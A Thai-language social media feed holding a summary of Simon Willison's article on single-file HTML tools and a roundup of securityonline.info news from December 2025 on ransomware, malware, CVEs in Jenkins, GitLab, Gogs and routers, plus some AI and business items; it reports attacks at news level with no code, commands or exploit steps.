• แนวทางใหม่ในการสร้าง HTML Tools

    Simon Willison ใช้คำว่า HTML tools เรียกแอปพลิเคชันที่เขาสร้างขึ้นกว่า 150 ตัวในช่วงสองปีที่ผ่านมา โดยส่วนใหญ่เขียนขึ้นด้วยความช่วยเหลือจาก LLMs จุดเด่นคือ รวมทุกอย่างไว้ในไฟล์เดียว ทำให้สามารถ copy-paste ไปใช้งานหรือโฮสต์บน GitHub Pages ได้ทันที โดยไม่ต้องใช้ React หรือ build step ที่ซับซ้อน

    เทคนิคสำคัญในการพัฒนา
    เขาแนะนำให้ โหลด dependencies จาก CDN เพื่อลดความยุ่งยาก และใช้ copy-paste เป็นกลไกหลัก เช่น การสร้างปุ่ม “Copy to clipboard” เพื่อให้ผู้ใช้สามารถนำข้อมูลไปใช้ต่อได้สะดวก นอกจากนี้ยังมีการใช้ localStorage สำหรับเก็บ state หรือ API keys และการเก็บข้อมูลใน URL เพื่อแชร์หรือ bookmark ได้ง่าย

    การต่อยอดด้วย Pyodide และ WebAssembly
    หนึ่งในแนวทางที่น่าสนใจคือการใช้ Pyodide เพื่อรัน Python ในเบราว์เซอร์ และการใช้ WebAssembly เพื่อเปิดโอกาสให้ซอฟต์แวร์จากภาษาอื่น ๆ ทำงานบน HTML tools ได้ เช่น OCR หรือการบีบอัดภาพ สิ่งเหล่านี้ทำให้ HTML tools สามารถทำงานซับซ้อนโดยไม่ต้องพึ่ง server

    บทเรียนและแรงบันดาลใจ
    Simon ย้ำว่า การสร้าง HTML tools เป็นวิธีที่สนุกและทรงพลังในการเรียนรู้ความสามารถของ LLMs และยังช่วยให้เข้าใจศักยภาพของ Web APIs ได้ลึกขึ้น เขาแนะนำให้ทุกคนลองสร้างคอลเลกชันของตัวเอง โดยเริ่มจาก GitHub Pages และไฟล์ HTML ง่าย ๆ

    สรุปเป็นหัวข้อ
    แนวคิด HTML Tools
    แอปพลิเคชันเล็ก ๆ รวม HTML, CSS, JS ในไฟล์เดียว
    ไม่ต้องใช้ React หรือ build step

    เทคนิคการพัฒนา
    โหลด dependencies จาก CDN
    ใช้ copy-paste และปุ่ม clipboard
    เก็บข้อมูลใน URL และ localStorage

    การต่อยอดด้วยเทคโนโลยี
    Pyodide สำหรับรัน Python ในเบราว์เซอร์
    WebAssembly สำหรับ OCR และ image compression

    คำเตือนในการใช้งาน
    การฝัง API key ใน HTML อาจเสี่ยงถูกขโมย
    การพึ่งพา CDN ต้องตรวจสอบเวอร์ชันและความปลอดภัย
    การใช้ localStorage เก็บข้อมูลสำคัญอาจเสี่ยงต่อการรั่วไหล

    https://simonwillison.net/2025/Dec/10/html-tools/
    🛠️ แนวทางใหม่ในการสร้าง HTML Tools Simon Willison ใช้คำว่า HTML tools เรียกแอปพลิเคชันที่เขาสร้างขึ้นกว่า 150 ตัวในช่วงสองปีที่ผ่านมา โดยส่วนใหญ่เขียนขึ้นด้วยความช่วยเหลือจาก LLMs จุดเด่นคือ รวมทุกอย่างไว้ในไฟล์เดียว ทำให้สามารถ copy-paste ไปใช้งานหรือโฮสต์บน GitHub Pages ได้ทันที โดยไม่ต้องใช้ React หรือ build step ที่ซับซ้อน 🌐 เทคนิคสำคัญในการพัฒนา เขาแนะนำให้ โหลด dependencies จาก CDN เพื่อลดความยุ่งยาก และใช้ copy-paste เป็นกลไกหลัก เช่น การสร้างปุ่ม “Copy to clipboard” เพื่อให้ผู้ใช้สามารถนำข้อมูลไปใช้ต่อได้สะดวก นอกจากนี้ยังมีการใช้ localStorage สำหรับเก็บ state หรือ API keys และการเก็บข้อมูลใน URL เพื่อแชร์หรือ bookmark ได้ง่าย ⚡ การต่อยอดด้วย Pyodide และ WebAssembly หนึ่งในแนวทางที่น่าสนใจคือการใช้ Pyodide เพื่อรัน Python ในเบราว์เซอร์ และการใช้ WebAssembly เพื่อเปิดโอกาสให้ซอฟต์แวร์จากภาษาอื่น ๆ ทำงานบน HTML tools ได้ เช่น OCR หรือการบีบอัดภาพ สิ่งเหล่านี้ทำให้ HTML tools สามารถทำงานซับซ้อนโดยไม่ต้องพึ่ง server 🚀 บทเรียนและแรงบันดาลใจ Simon ย้ำว่า การสร้าง HTML tools เป็นวิธีที่สนุกและทรงพลังในการเรียนรู้ความสามารถของ LLMs และยังช่วยให้เข้าใจศักยภาพของ Web APIs ได้ลึกขึ้น เขาแนะนำให้ทุกคนลองสร้างคอลเลกชันของตัวเอง โดยเริ่มจาก GitHub Pages และไฟล์ HTML ง่าย ๆ 📌 สรุปเป็นหัวข้อ ✅ แนวคิด HTML Tools ➡️ แอปพลิเคชันเล็ก ๆ รวม HTML, CSS, JS ในไฟล์เดียว ➡️ ไม่ต้องใช้ React หรือ build step ✅ เทคนิคการพัฒนา ➡️ โหลด dependencies จาก CDN ➡️ ใช้ copy-paste และปุ่ม clipboard ➡️ เก็บข้อมูลใน URL และ localStorage ✅ การต่อยอดด้วยเทคโนโลยี ➡️ Pyodide สำหรับรัน Python ในเบราว์เซอร์ ➡️ WebAssembly สำหรับ OCR และ image compression ‼️ คำเตือนในการใช้งาน ⛔ การฝัง API key ใน HTML อาจเสี่ยงถูกขโมย ⛔ การพึ่งพา CDN ต้องตรวจสอบเวอร์ชันและความปลอดภัย ⛔ การใช้ localStorage เก็บข้อมูลสำคัญอาจเสี่ยงต่อการรั่วไหล https://simonwillison.net/2025/Dec/10/html-tools/
    SIMONWILLISON.NET
    Useful patterns for building HTML tools
    I’ve started using the term HTML tools to refer to HTML applications that I’ve been building which combine HTML, JavaScript, and CSS in a single file and use them to …
    0 Comments 0 Shares 173 Views 0 Reviews
  • รวมข่าวจากเวบ SecurityOnline

    #รวมข่าวIT #20251211 #securityonline

    Makop Ransomware กลับมาอีกครั้งพร้อมกลยุทธ์ใหม่
    ภัยคุกคามที่เคยคุ้นชื่อ Makop ransomware ได้พัฒนาวิธีการโจมตีให้ซับซ้อนขึ้น แม้จะยังใช้ช่องโหว่เดิมคือการเจาะผ่านพอร์ต RDP ที่ไม่ได้ป้องกัน แต่ครั้งนี้พวกเขาเสริมเครื่องมืออย่าง GuLoader เพื่อดาวน์โหลดมัลแวร์เพิ่มเติม และยังใช้เทคนิค BYOVD (Bring Your Own Vulnerable Driver) เพื่อฆ่าโปรแกรมป้องกันไวรัสในระดับ kernel ได้โดยตรง การโจมตีส่วนใหญ่พุ่งเป้าไปที่องค์กรในอินเดีย แต่ก็พบในหลายประเทศอื่นด้วย จุดสำคัญคือ แม้จะเป็นการโจมตีที่ดู “ง่าย” แต่ผลลัพธ์กลับสร้างความเสียหายรุนแรงต่อองค์กรที่ละเลยการอัปเดตและการตั้งค่าความปลอดภัย
    https://securityonline.info/makop-ransomware-evolves-guloader-and-byovd-edr-killers-used-to-attack-rdp-exposed-networks

    DeadLock Ransomware ใช้ช่องโหว่ไดรเวอร์ Baidu เจาะระบบ
    กลุ่มอาชญากรไซเบอร์ที่หวังผลทางการเงินได้ปล่อยแรนซัมแวร์ชื่อ DeadLock โดยใช้เทคนิค BYOVD เช่นกัน คราวนี้พวกเขาอาศัยไดรเวอร์จาก Baidu Antivirus ที่มีช่องโหว่ ทำให้สามารถสั่งงานในระดับ kernel และปิดการทำงานของโปรแกรมป้องกันได้ทันที หลังจากนั้นยังใช้ PowerShell script ปิดบริการสำคัญ เช่น SQL Server และลบ shadow copies เพื่อกันไม่ให้เหยื่อกู้คืนข้อมูลได้ ตัวแรนซัมแวร์ถูกเขียนขึ้นใหม่ด้วย C++ และใช้วิธีเข้ารหัสเฉพาะที่ไม่เหมือนใคร ที่น่าสนใจคือพวกเขาไม่ใช้วิธี “double extortion” แต่ให้เหยื่อติดต่อผ่านแอป Session เพื่อเจรจาจ่ายค่าไถ่เป็น Bitcoin หรือ Monero
    https://securityonline.info/deadlock-ransomware-deploys-byovd-edr-killer-by-exploiting-baidu-driver-for-kernel-level-defense-bypass

    ช่องโหว่ร้ายแรงใน PCIe 6.0 เสี่ยงข้อมูลเสียหาย
    มาตรฐาน PCIe 6.0 ที่ใช้ในการส่งข้อมูลความเร็วสูงถูกพบว่ามีช่องโหว่ในกลไก IDE (Integrity and Data Encryption) ซึ่งอาจทำให้ผู้โจมตีที่มีสิทธิ์เข้าถึงฮาร์ดแวร์สามารถฉีดข้อมูลที่ผิดพลาดหรือเก่าเข้ามาในระบบได้ ช่องโหว่นี้ถูกระบุเป็น CVE-2025-9612, 9613 และ 9614 แม้จะไม่สามารถโจมตีจากระยะไกล แต่ก็เป็นภัยใหญ่สำหรับศูนย์ข้อมูลหรือระบบที่ต้องการความปลอดภัยสูง ตอนนี้ PCI-SIG ได้ออก Draft Engineering Change Notice เพื่อแก้ไข และแนะนำให้ผู้ผลิตอัปเดตเฟิร์มแวร์เพื่อปิดช่องโหว่เหล่านี้โดยเร็ว
    https://securityonline.info/critical-pcie-6-0-flaws-risk-secure-data-integrity-via-stale-data-injection-in-ide-mechanism

    EtherRAT Malware ใช้บล็อกเชน Ethereum ซ่อนร่องรอย
    หลังจากเกิดช่องโหว่ React2Shell เพียงไม่กี่วัน นักวิจัยพบมัลแวร์ใหม่ชื่อ EtherRAT ที่ใช้บล็อกเชน Ethereum เป็นช่องทางสื่อสารกับผู้ควบคุม โดยอาศัย smart contracts เพื่อรับคำสั่ง ทำให้แทบไม่สามารถปิดกั้นได้ เพราะเครือข่าย Ethereum เป็นระบบกระจายศูนย์ นอกจากนี้ EtherRAT ยังมีความคล้ายคลึงกับเครื่องมือที่เคยใช้โดยกลุ่ม Lazarus ของเกาหลีเหนือ และถูกออกแบบให้ฝังตัวแน่นหนาในระบบ Linux ด้วยหลายวิธีการ persistence พร้อมทั้งดาวน์โหลด runtime ของ Node.js เองเพื่อกลมกลืนกับการทำงานปกติ ถือเป็นการยกระดับการโจมตีจากช่องโหว่ React2Shell ไปสู่ระดับ APT ที่อันตรายยิ่งขึ้น
    https://securityonline.info/etherrat-malware-hijacks-ethereum-blockchain-for-covert-c2-after-react2shell-exploit

    Slack CEO ย้ายไปร่วมทีม OpenAI เป็น CRO
    OpenAI กำลังเร่งหาทางสร้างรายได้เพื่อรองรับค่าใช้จ่ายมหาศาลในการประมวลผล AI ล่าสุดได้ดึง Denise Dresser ซีอีโอของ Slack เข้ามารับตำแหน่ง Chief Revenue Officer (CRO) เพื่อดูแลกลยุทธ์รายได้และการขยายตลาดองค์กร การเข้ามาของเธอสะท้อนให้เห็นว่า OpenAI กำลังใช้แนวทางแบบ Silicon Valley อย่างเต็มรูปแบบ ทั้งการขยายฐานผู้ใช้และการหาช่องทางทำเงิน ไม่ว่าจะเป็นการขาย subscription หรือแม้กระทั่งโฆษณาใน ChatGPT อย่างไรก็ตาม ความท้าทายใหญ่คือการทำให้รายได้เติบโตทันกับค่าใช้จ่ายที่สูงลิ่วจากการสร้างและดูแลโครงสร้างพื้นฐาน AI
    https://securityonline.info/slack-ceo-denise-dresser-joins-openai-as-cro-to-solve-the-profitability-puzzle

    Jenkins เจอช่องโหว่ร้ายแรง เสี่ยงถูกโจมตี DoS และ XSS
    ทีมพัฒนา Jenkins ออกประกาศเตือนครั้งใหญ่ หลังพบช่องโหว่หลายรายการที่อาจทำให้ระบบ CI/CD ถูกโจมตีจนหยุดทำงาน หรือโดนฝังสคริปต์อันตราย (XSS) โดยเฉพาะช่องโหว่ CVE-2025-67635 ที่เปิดโอกาสให้แฮกเกอร์ส่งคำสั่งผ่าน HTTP CLI โดยไม่ต้องล็อกอิน ทำให้เซิร์ฟเวอร์ทรัพยากรถูกใช้จนล่ม อีกช่องโหว่ CVE-2025-67641 ใน Coverage Plugin ก็เปิดทางให้ผู้โจมตีฝังโค้ด JavaScript ลงในรายงาน เมื่อผู้ดูแลเปิดดู รายงานนั้นจะรันสคริปต์ทันที เสี่ยงต่อการถูกขโมย session และข้อมูลสำคัญ แม้จะมีการอัปเดตแก้ไขหลายจุด เช่น การเข้ารหัส token และการปิดช่องโหว่การเห็นรหัสผ่าน แต่ยังมีบางปลั๊กอินที่ยังไม่มีแพตช์ออกมา ทำให้ผู้ดูแลระบบต้องรีบอัปเดต Jenkins และปลั๊กอินที่เกี่ยวข้องเพื่อป้องกันความเสียหาย
    https://securityonline.info/high-severity-jenkins-flaws-risk-unauthenticated-dos-via-http-cli-and-xss-via-coverage-reports

    Gogs Zero-Day โดนเจาะกว่า 700 เซิร์ฟเวอร์ ผ่าน Symlink Path Traversal
    นักวิจัยจาก Wiz พบช่องโหว่ใหม่ใน Gogs (CVE-2025-8110) ที่เปิดทางให้ผู้โจมตีสามารถเขียนไฟล์อันตรายลงในระบบได้ง่าย ๆ ผ่านการใช้ symlink โดยช่องโหว่นี้เป็นการเลี่ยงแพตช์เก่าที่เคยแก้ไขไปแล้ว ทำให้กว่า 700 เซิร์ฟเวอร์จาก 1,400 ที่ตรวจสอบถูกเจาะสำเร็จ การโจมตีมีลักษณะเป็นแคมเปญ “smash-and-grab” คือเข้ามาเร็ว ใช้ symlink เขียนทับไฟล์สำคัญ เช่น .git/config แล้วรันคำสั่งอันตราย จากนั้นติดตั้ง payload ที่ใช้ Supershell เพื่อควบคุมเครื่องจากระยะไกล ปัจจุบันยังไม่มีแพตช์ออกมา ผู้ดูแลระบบจึงถูกแนะนำให้ปิดการสมัครสมาชิกสาธารณะ และจำกัดการเข้าถึงระบบทันที
    https://securityonline.info/gogs-zero-day-cve-2025-8110-risks-rce-for-700-servers-via-symlink-path-traversal-bypass

    GitLab พบช่องโหว่ XSS เสี่ยงโดนขโมย session ผ่าน Wiki
    GitLab ออกอัปเดตด่วนเพื่อแก้ไขช่องโหว่ CVE-2025-12716 ที่มีความรุนแรงสูง (CVSS 8.7) โดยช่องโหว่นี้เกิดขึ้นในฟีเจอร์ Wiki ที่ผู้ใช้สามารถสร้างเพจได้ หากมีการฝังโค้ดอันตรายลงไป เมื่อผู้ใช้รายอื่นเปิดดู เพจนั้นจะรันคำสั่งแทนผู้ใช้โดยอัตโนมัติ เสี่ยงต่อการถูกยึด session และสั่งงานแทนเจ้าของบัญชี นอกจากนี้ยังมีช่องโหว่อื่น ๆ เช่น การ inject HTML ในรายงานช่องโหว่ และการเปิดเผยข้อมูลโครงการที่ควรเป็น private ผ่าน error message และ GraphQL query GitLab.com และ GitLab Dedicated ได้รับการแก้ไขแล้ว แต่ผู้ที่ใช้ self-managed instance ต้องรีบอัปเดตเวอร์ชัน 18.6.2, 18.5.4 หรือ 18.4.6 เพื่อปิดช่องโหว่เหล่านี้
    https://securityonline.info/high-severity-gitlab-xss-flaw-cve-2025-12716-risks-session-hijack-via-malicious-wiki-pages

    Facebook ปรับโฉมใหม่ แต่ Instagram ใช้ AI ดึง SEO
    มีรายงานว่า Facebook ได้ปรับโฉมหน้าตาใหม่ แต่สิ่งที่น่าสนใจคือ Instagram ถูกเปิดโปงว่าใช้ AI เพื่อสร้างคอนเทนต์ที่ดึง SEO ให้ติดอันดับการค้นหา คล้ายกับการทำ content farm โดยไม่ได้บอกผู้ใช้ตรง ๆ เรื่องนี้จึงถูกตั้งคำถามถึงความโปร่งใสและจริยธรรมของ Meta ที่อาจใช้ AI เพื่อผลักดันการเข้าถึงโดยไม่เปิดเผยต่อสาธารณะ
    https://securityonline.info/facebook-gets-new-look-but-instagram-secretly-uses-ai-for-seo-bait

    SpaceX เตรียม IPO มูลค่าเป้าหมายทะลุ 1.5 ล้านล้านดอลลาร์
    SpaceX กำลังเดินหน้าแผน IPO ครั้งใหญ่ที่สุดในประวัติศาสตร์ โดยตั้งเป้าระดมทุนกว่า 30 พันล้านดอลลาร์ ซึ่งจะทำลายสถิติของ Saudi Aramco ที่เคยทำไว้ในปี 2019 ที่ 29 พันล้านดอลลาร์ สิ่งที่ทำให้ตลาดตะลึงคือการตั้งเป้ามูลค่าบริษัทไว้สูงถึง 1.5 ล้านล้านดอลลาร์ แม้รายได้ของ SpaceX ในปี 2025 จะอยู่ที่ประมาณ 15.5 พันล้านดอลลาร์ ซึ่งน้อยกว่า Tesla ถึง 6 เท่า แต่ความคาดหวังอยู่ที่อนาคตของ Starlink และ Starship รวมถึงแผนสร้างศูนย์ข้อมูลในอวกาศเพื่อรองรับ AI และการสื่อสารผ่านดาวเทียม Musk เชื่อว่าการรวมพลังของ Starlink และ Starship จะขยายตลาดได้มหาศาล และนี่อาจเป็นก้าวสำคัญที่สุดของ SpaceX
    https://securityonline.info/spacex-ipo-targeting-a-1-5-trillion-valuation-to-fund-space-data-centers

    จีนเปิดปฏิบัติการไซเบอร์ WARP PANDA ใช้ BRICKSTORM เจาะ VMware และ Azure
    มีการเปิดโปงแคมเปญจารกรรมไซเบอร์ครั้งใหญ่ที่ดำเนินการโดยกลุ่มแฮกเกอร์จากจีนชื่อ WARP PANDA พวกเขาไม่ได้โจมตีแบบธรรมดา แต่เลือกเจาะเข้าไปในโครงสร้างพื้นฐาน IT ที่สำคัญอย่าง VMware vCenter และ ESXi รวมถึงระบบคลาวด์ Microsoft Azure จุดเด่นคือการใช้เครื่องมือที่สร้างขึ้นเองชื่อ BRICKSTORM ซึ่งเป็น backdoor ที่แฝงตัวเหมือนโปรเซสของระบบ ทำให้ยากต่อการตรวจจับ นอกจากนี้ยังมีเครื่องมือเสริมอย่าง Junction และ GuestConduit ที่ช่วยควบคุมการสื่อสารในระบบเสมือนจริงได้อย่างแนบเนียน สิ่งที่น่ากังวลคือพวกเขาสามารถอยู่ในระบบได้นานเป็นปีโดยไม่ถูกพบ และยังขยายการโจมตีไปสู่บริการ Microsoft 365 เพื่อขโมยข้อมูลสำคัญ การกระทำเหล่านี้สะท้อนให้เห็นถึงแรงจูงใจเชิงรัฐมากกว่าการเงิน เพราะเป้าหมายคือข้อมูลที่เกี่ยวข้องกับผลประโยชน์ของรัฐบาลจีน
    https://securityonline.info/chinas-warp-panda-apt-deploys-brickstorm-backdoor-to-hijack-vmware-vcenter-esxi-and-azure-cloud

    ช่องโหว่ร้ายแรง TOTOLINK AX1800 เปิดทางให้แฮกเกอร์เข้าถึง root โดยไม่ต้องล็อกอิน
    มีการค้นพบช่องโหว่ในเราเตอร์ TOTOLINK AX1800 ที่ใช้กันแพร่หลายในบ้านและธุรกิจขนาดเล็ก ช่องโหว่นี้ทำให้ผู้โจมตีสามารถส่งคำสั่ง HTTP เพียงครั้งเดียวเพื่อเปิดบริการ Telnet โดยไม่ต้องผ่านการยืนยันตัวตน เมื่อ Telnet ถูกเปิดแล้ว แฮกเกอร์สามารถเข้าถึงสิทธิ์ระดับ root และควบคุมอุปกรณ์ได้เต็มรูปแบบ ผลกระทบคือสามารถดักจับข้อมูล เปลี่ยนเส้นทาง DNS หรือใช้เป็นฐานโจมตีอุปกรณ์อื่นในเครือข่ายได้ ที่น่ากังวลคือยังไม่มีแพตช์แก้ไขจากผู้ผลิต ทำให้ผู้ใช้ต้องป้องกันตัวเองด้วยการปิดการเข้าถึงจาก WAN และตรวจสอบการเปิดใช้งาน Telnet อย่างเข้มงวด
    https://securityonline.info/unpatched-totolink-ax1800-router-flaw-allows-unauthenticated-telnet-root-rce

    FBI และ CISA เตือนกลุ่มแฮกเกอร์สายโปรรัสเซียโจมตีโครงสร้างพื้นฐานผ่าน VNC ที่ไม่ปลอดภัย
    หน่วยงานด้านความมั่นคงไซเบอร์ของสหรัฐฯ รวมถึง FBI และ CISA ออกคำเตือนว่ากลุ่มแฮกเกอร์ที่สนับสนุนรัสเซียกำลังโจมตีโครงสร้างพื้นฐานสำคัญ เช่น ระบบน้ำ พลังงาน และอาหาร โดยใช้วิธีง่าย ๆ คือค้นหา Human-Machine Interfaces (HMI) ที่เชื่อมต่อผ่าน VNC แต่ไม่ได้ตั้งรหัสผ่านที่แข็งแรง เมื่อเข้าถึงได้ พวกเขาจะปรับเปลี่ยนค่าการทำงาน เช่น ความเร็วปั๊ม หรือปิดระบบแจ้งเตือน ทำให้ผู้ควบคุมไม่เห็นภาพจริงของโรงงาน กลุ่มที่ถูกระบุมีทั้ง Cyber Army of Russia Reborn, NoName057(16), Z-Pentest และ Sector16 ซึ่งมีความเชื่อมโยงกับรัฐรัสเซีย แม้จะไม่ซับซ้อน แต่การโจมตีแบบนี้สร้างความเสียหายได้จริงและยากต่อการคาดเดา
    https://securityonline.info/fbi-cisa-warn-pro-russia-hacktivists-target-critical-infrastructure-via-unsecured-vnc-hmis

    ช่องโหว่ร้ายแรงใน CCTV (CVE-2025-13607) เสี่ยงถูกแฮกดูภาพสดและขโมยรหัสผ่าน
    CISA ออกประกาศเตือนเกี่ยวกับช่องโหว่ในกล้องวงจรปิดที่เชื่อมต่อเครือข่าย โดยเฉพาะรุ่น D-Link DCS-F5614-L1 ที่เปิดช่องให้ผู้โจมตีเข้าถึงการตั้งค่าและข้อมูลบัญชีได้โดยไม่ต้องยืนยันตัวตน ผลคือสามารถดูภาพสดจากกล้องและขโมยรหัสผ่านผู้ดูแลเพื่อเจาะลึกเข้าไปในระบบต่อไปได้ ช่องโหว่นี้มีคะแนนความรุนแรงสูงถึง 9.4 และแม้ D-Link จะออกเฟิร์มแวร์แก้ไขแล้ว แต่ผู้ใช้แบรนด์อื่นอย่าง Securus และ Sparsh ยังไม่ได้รับการตอบสนอง ทำให้ผู้ใช้ต้องรีบตรวจสอบและติดต่อผู้ผลิตเองเพื่อความปลอดภัย
    https://securityonline.info/critical-cctv-flaw-cve-2025-13607-risks-video-feed-hijack-credential-theft-via-missing-authentication

    ข่าวด่วน: Google ออกแพตช์ฉุกเฉินแก้ช่องโหว่ Zero-Day บน Chrome
    เรื่องนี้เป็นการอัปเดตที่สำคัญมากของ Google Chrome เพราะมีการค้นพบช่องโหว่ร้ายแรงที่ถูกโจมตีจริงแล้วในโลกออนไลน์ Google จึงรีบปล่อยเวอร์ชันใหม่ 143.0.7499.109/.110 เพื่ออุดช่องโหว่ โดยช่องโหว่นี้ถูกระบุว่าเป็น “Under coordination” ซึ่งหมายถึงยังอยู่ระหว่างการทำงานร่วมกับผู้พัฒนาซอฟต์แวร์อื่น ๆ ทำให้รายละเอียดเชิงเทคนิคยังไม่ถูกเปิดเผย แต่ที่แน่ ๆ คือมีผู้ไม่หวังดีนำไปใช้โจมตีแล้ว นอกจากนี้ยังมีการแก้ไขช่องโหว่ระดับกลางอีกสองรายการ ได้แก่ปัญหาใน Password Manager และ Toolbar ที่นักวิจัยภายนอกรายงานเข้ามา พร้อมได้รับรางวัลบั๊กบาวน์ตี้รวม 4,000 ดอลลาร์ เรื่องนี้จึงเป็นการเตือนผู้ใช้ทุกคนให้รีบตรวจสอบและอัปเดต Chrome ด้วยตนเองทันที ไม่ควรรอการอัปเดตอัตโนมัติ เพราะความเสี่ยงกำลังเกิดขึ้นจริงแล้ว
    https://securityonline.info/emergency-chrome-update-google-patches-new-zero-day-under-active-attack

    นวัตกรรมใหม่: สถาปัตยกรรม AI ของ Google แรงกว่า GPT-4 ในด้านความจำ
    Google เปิดตัวสถาปัตยกรรมใหม่ชื่อ Titans และกรอบแนวคิด MIRAS ที่ออกแบบมาเพื่อแก้ปัญหาการจำข้อมูลระยะยาวของโมเดล AI แบบเดิม ๆ จุดเด่นคือสามารถ “อ่านไป จำไป” ได้เหมือนสมองมนุษย์ โดยใช้โมดูลความจำระยะยาวที่ทำงานคล้ายการแยกความจำสั้นและยาวในสมองจริง ๆ สิ่งที่น่าสนใจที่สุดคือ “surprise metric” กลไกที่เลือกจำเฉพาะข้อมูลที่แปลกใหม่หรือไม่คาดคิด เช่นเดียวกับที่มนุษย์มักจำเหตุการณ์ที่ไม่ธรรมดาได้ชัดเจน ผลลัพธ์คือโมเดลนี้สามารถจัดการข้อมูลยาวมหาศาลได้ถึงสองล้านโทเคน และยังทำงานได้ดีกว่า GPT-4 แม้จะมีพารามิเตอร์น้อยกว่า นอกจากนี้ MIRAS ยังเปิดทางให้สร้างโมเดลใหม่ ๆ ที่มีความสามารถเฉพาะด้าน เช่นการทนต่อสัญญาณรบกวนหรือการรักษาความจำระยะยาวอย่างมั่นคง การทดสอบกับชุดข้อมูล BABILong แสดงให้เห็นว่า Titans มีศักยภาพเหนือกว่าโมเดลชั้นนำอื่น ๆ ในการดึงข้อมูลที่กระจายอยู่ในเอกสารขนาดใหญ่ ทำให้อนาคตของ AI ในการทำความเข้าใจทั้งเอกสารหรือแม้แต่ข้อมูลทางพันธุกรรมดูสดใสและทรงพลังมากขึ้น
    https://securityonline.info/the-surprise-metric-googles-new-ai-architecture-outperforms-gpt-4-in-memory

    📌🔐🟠 รวมข่าวจากเวบ SecurityOnline 🟠🔐📌 #รวมข่าวIT #20251211 #securityonline 🛡️ Makop Ransomware กลับมาอีกครั้งพร้อมกลยุทธ์ใหม่ ภัยคุกคามที่เคยคุ้นชื่อ Makop ransomware ได้พัฒนาวิธีการโจมตีให้ซับซ้อนขึ้น แม้จะยังใช้ช่องโหว่เดิมคือการเจาะผ่านพอร์ต RDP ที่ไม่ได้ป้องกัน แต่ครั้งนี้พวกเขาเสริมเครื่องมืออย่าง GuLoader เพื่อดาวน์โหลดมัลแวร์เพิ่มเติม และยังใช้เทคนิค BYOVD (Bring Your Own Vulnerable Driver) เพื่อฆ่าโปรแกรมป้องกันไวรัสในระดับ kernel ได้โดยตรง การโจมตีส่วนใหญ่พุ่งเป้าไปที่องค์กรในอินเดีย แต่ก็พบในหลายประเทศอื่นด้วย จุดสำคัญคือ แม้จะเป็นการโจมตีที่ดู “ง่าย” แต่ผลลัพธ์กลับสร้างความเสียหายรุนแรงต่อองค์กรที่ละเลยการอัปเดตและการตั้งค่าความปลอดภัย 🔗 https://securityonline.info/makop-ransomware-evolves-guloader-and-byovd-edr-killers-used-to-attack-rdp-exposed-networks 💻 DeadLock Ransomware ใช้ช่องโหว่ไดรเวอร์ Baidu เจาะระบบ กลุ่มอาชญากรไซเบอร์ที่หวังผลทางการเงินได้ปล่อยแรนซัมแวร์ชื่อ DeadLock โดยใช้เทคนิค BYOVD เช่นกัน คราวนี้พวกเขาอาศัยไดรเวอร์จาก Baidu Antivirus ที่มีช่องโหว่ ทำให้สามารถสั่งงานในระดับ kernel และปิดการทำงานของโปรแกรมป้องกันได้ทันที หลังจากนั้นยังใช้ PowerShell script ปิดบริการสำคัญ เช่น SQL Server และลบ shadow copies เพื่อกันไม่ให้เหยื่อกู้คืนข้อมูลได้ ตัวแรนซัมแวร์ถูกเขียนขึ้นใหม่ด้วย C++ และใช้วิธีเข้ารหัสเฉพาะที่ไม่เหมือนใคร ที่น่าสนใจคือพวกเขาไม่ใช้วิธี “double extortion” แต่ให้เหยื่อติดต่อผ่านแอป Session เพื่อเจรจาจ่ายค่าไถ่เป็น Bitcoin หรือ Monero 🔗 https://securityonline.info/deadlock-ransomware-deploys-byovd-edr-killer-by-exploiting-baidu-driver-for-kernel-level-defense-bypass ⚙️ ช่องโหว่ร้ายแรงใน PCIe 6.0 เสี่ยงข้อมูลเสียหาย มาตรฐาน PCIe 6.0 ที่ใช้ในการส่งข้อมูลความเร็วสูงถูกพบว่ามีช่องโหว่ในกลไก IDE (Integrity and Data Encryption) ซึ่งอาจทำให้ผู้โจมตีที่มีสิทธิ์เข้าถึงฮาร์ดแวร์สามารถฉีดข้อมูลที่ผิดพลาดหรือเก่าเข้ามาในระบบได้ ช่องโหว่นี้ถูกระบุเป็น CVE-2025-9612, 9613 และ 9614 แม้จะไม่สามารถโจมตีจากระยะไกล แต่ก็เป็นภัยใหญ่สำหรับศูนย์ข้อมูลหรือระบบที่ต้องการความปลอดภัยสูง ตอนนี้ PCI-SIG ได้ออก Draft Engineering Change Notice เพื่อแก้ไข และแนะนำให้ผู้ผลิตอัปเดตเฟิร์มแวร์เพื่อปิดช่องโหว่เหล่านี้โดยเร็ว 🔗 https://securityonline.info/critical-pcie-6-0-flaws-risk-secure-data-integrity-via-stale-data-injection-in-ide-mechanism 🪙 EtherRAT Malware ใช้บล็อกเชน Ethereum ซ่อนร่องรอย หลังจากเกิดช่องโหว่ React2Shell เพียงไม่กี่วัน นักวิจัยพบมัลแวร์ใหม่ชื่อ EtherRAT ที่ใช้บล็อกเชน Ethereum เป็นช่องทางสื่อสารกับผู้ควบคุม โดยอาศัย smart contracts เพื่อรับคำสั่ง ทำให้แทบไม่สามารถปิดกั้นได้ เพราะเครือข่าย Ethereum เป็นระบบกระจายศูนย์ นอกจากนี้ EtherRAT ยังมีความคล้ายคลึงกับเครื่องมือที่เคยใช้โดยกลุ่ม Lazarus ของเกาหลีเหนือ และถูกออกแบบให้ฝังตัวแน่นหนาในระบบ Linux ด้วยหลายวิธีการ persistence พร้อมทั้งดาวน์โหลด runtime ของ Node.js เองเพื่อกลมกลืนกับการทำงานปกติ ถือเป็นการยกระดับการโจมตีจากช่องโหว่ React2Shell ไปสู่ระดับ APT ที่อันตรายยิ่งขึ้น 🔗 https://securityonline.info/etherrat-malware-hijacks-ethereum-blockchain-for-covert-c2-after-react2shell-exploit 🤝 Slack CEO ย้ายไปร่วมทีม OpenAI เป็น CRO OpenAI กำลังเร่งหาทางสร้างรายได้เพื่อรองรับค่าใช้จ่ายมหาศาลในการประมวลผล AI ล่าสุดได้ดึง Denise Dresser ซีอีโอของ Slack เข้ามารับตำแหน่ง Chief Revenue Officer (CRO) เพื่อดูแลกลยุทธ์รายได้และการขยายตลาดองค์กร การเข้ามาของเธอสะท้อนให้เห็นว่า OpenAI กำลังใช้แนวทางแบบ Silicon Valley อย่างเต็มรูปแบบ ทั้งการขยายฐานผู้ใช้และการหาช่องทางทำเงิน ไม่ว่าจะเป็นการขาย subscription หรือแม้กระทั่งโฆษณาใน ChatGPT อย่างไรก็ตาม ความท้าทายใหญ่คือการทำให้รายได้เติบโตทันกับค่าใช้จ่ายที่สูงลิ่วจากการสร้างและดูแลโครงสร้างพื้นฐาน AI 🔗 